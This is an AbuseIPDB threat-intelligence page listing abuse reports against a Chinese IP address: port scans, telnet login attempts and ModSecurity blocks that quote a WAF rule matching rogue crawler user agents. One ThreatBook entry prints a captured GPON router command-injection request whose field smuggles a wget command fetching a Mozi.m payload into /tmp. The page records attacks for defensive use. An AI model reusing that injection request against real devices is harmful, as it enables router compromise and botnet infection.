JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 120.85.114.157

120.85.114.157 was found in our database!

This IP was reported 227 times. Confidence of Abuse is 16%: ?

16%

ISP	United-Communications-Network-Technology-Co-Ltd, GuangZhou
Usage Type	Fixed Line ISP
ASN	AS17622
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Guangzhou, Guangdong

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 120.85.114.157

Whois 120.85.114.157

IP Abuse Reports for 120.85.114.157:

This IP address has been reported a total of 227 times from 39 distinct sources. 120.85.114.157 was first reported on January 17th 2021, and the most recent report was 2 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 2 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 TPI-Abuse	2026-06-08 04:41:38 (2 weeks ago)	(mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Jun 08 00:41:33.665595 2026] [security2:error] [pid 24780:tid 24780] [client 120.85.114.157:27237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:^(?:microsoft url\|user-Agent\|www\\\\.weblogs\\\\.com\|(?:jakart\|vi)a\|(google\|i{0,1}explorer{0,1}\\\\.exe\|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)\|\\\\bdatacha0s\\\\b\|; widows\|\\\\\\\\r\|a(?: href=\|d(?:sarobot\|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler\|\|www.angelachawkins.com\|F\|4"] [data "User-Agent"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "www.angelachawkins.com"] [uri "/"] [unique_id "aiZH_eLPIw-XBLuros3GugAAAA4"], referer: http://www.angelachawkins.com/ show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2026-06-05 18:28:17 (2 weeks ago)	(mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jun 05 14:28:10.263707 2026] [security2:error] [pid 20120:tid 20120] [client 120.85.114.157:27136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:^(?:microsoft url\|user-Agent\|www\\\\.weblogs\\\\.com\|(?:jakart\|vi)a\|(google\|i{0,1}explorer{0,1}\\\\.exe\|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)\|\\\\bdatacha0s\\\\b\|; widows\|\\\\\\\\r\|a(?: href=\|d(?:sarobot\|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler\|\|www.talamancareserve.com\|F\|4"] [data "User-Agent"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "www.talamancareserve.com"] [uri "/"] [unique_id "aiMVOuF-h3LuLsmrlMYiHgAAAA0"], referer: http://www.talamancareserve.com/ show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2026-05-24 23:06:32 (4 weeks ago)	(mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210831) triggered by 120.85.114.157 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun May 24 19:06:26.188058 2026] [security2:error] [pid 11226:tid 11226] [client 120.85.114.157:29439] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:^(?:microsoft url\|user-Agent\|www\\\\.weblogs\\\\.com\|(?:jakart\|vi)a\|(google\|i{0,1}explorer{0,1}\\\\.exe\|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)\|\\\\bdatacha0s\\\\b\|; widows\|\\\\\\\\r\|a(?: href=\|d(?:sarobot\|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler\|\|getlawforms.com\|F\|4"] [data "User-Agent"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "getlawforms.com"] [uri "/"] [unique_id "ahOEcqXZi2hFLtsTSEb5DAAAAAk"], referer: http://getlawforms.com/ show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2026-05-01 17:40:18 (1 month ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇺🇸 cybsecaoccol	2026-04-29 22:56:38 (1 month ago)	unauthorized connection or malicious port scan attempted on tcp port - corp	Port Scan Hacking
Anonymous	2026-04-29 01:17:16 (1 month ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇺🇸 drewf.ink	2026-04-28 09:12:36 (1 month ago)	[09:12] Attempted telnet login on port 23 with username root	Brute-Force Exploited Host
Anonymous	2025-12-11 02:00:59 (6 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-10-26 10:02:07 (7 months ago)	Unauthorized connection attempt on Port 23	Port Scan Hacking Exploited Host
Anonymous	2025-10-25 14:07:36 (7 months ago)	Unauthorized connection attempt on Port 2323	Port Scan Hacking Exploited Host
🇺🇸 MPL	2025-10-25 05:57:26 (7 months ago)	tcp/23 (4 or more attempts)	Port Scan
🇺🇸 MPL	2025-10-25 05:57:26 (7 months ago)	tcp/23 (8 or more attempts)	Port Scan
🇨🇳 ThreatBook.io	2025-04-20 22:58:55 (1 year ago)	ThreatBook Intelligence: Scanner,Gateway more details on https://threatbook.io/ip/120.85.114.157	SSH
🇨🇳 ThreatBook.io	2025-04-19 23:04:16 (1 year ago)	ThreatBook Intelligence: Scanner,Gateway more details on https://threatbook.io/ip/120.85.114.157 202 ... show more ThreatBook Intelligence: Scanner,Gateway more details on https://threatbook.io/ip/120.85.114.157 2025-04-19 16:05:48 /GponForm/diag_Form?images/,{"body":"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+-\u003e/tmp/gpon8080;s","content_type":"","header":{"Accept":["/"],"Accept-Encoding":["gzip, deflate"],"Connection":["keep-alive"],"Content-Length":["118"],"User-Agent":["Hello, World"]},"host":"127.0.0.1:8080","method":"POST","proto":"HTTP/1.1","remote_addr":"120.85.114.157:12013","status_code":200,"url":"/GponForm/diag_Form?images/","user_agent":"Hello, World"} show less	Web App Attack
Anonymous	2025-04-17 00:58:52 (1 year ago)	Unauthorized connection attempt on Port 23	Port Scan Hacking Exploited Host

Showing 1 to 15 of 227 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇬🇧 92.207.4.157

🇺🇸 44.219.20.78

🇺🇸 20.55.29.197

🇺🇸 13.86.116.129

🇬🇧 5.226.140.98

🇵🇾 181.123.62.210

🇭🇰 165.154.41.97

🇬🇧 159.253.63.187

🇺🇸 157.230.15.107

🇺🇸 44.211.88.27

🇺🇸 44.186.57.25

🇻🇳 27.71.230.31

🇺🇸 152.32.183.236

🇨🇳 111.9.22.102

🇳🇬 102.88.137.80

🇰🇷 61.37.150.6

🇺🇸 44.180.231.246

🇺🇸 135.232.227.144

🇺🇸 44.166.113.230

🇺🇸 44.25.133.131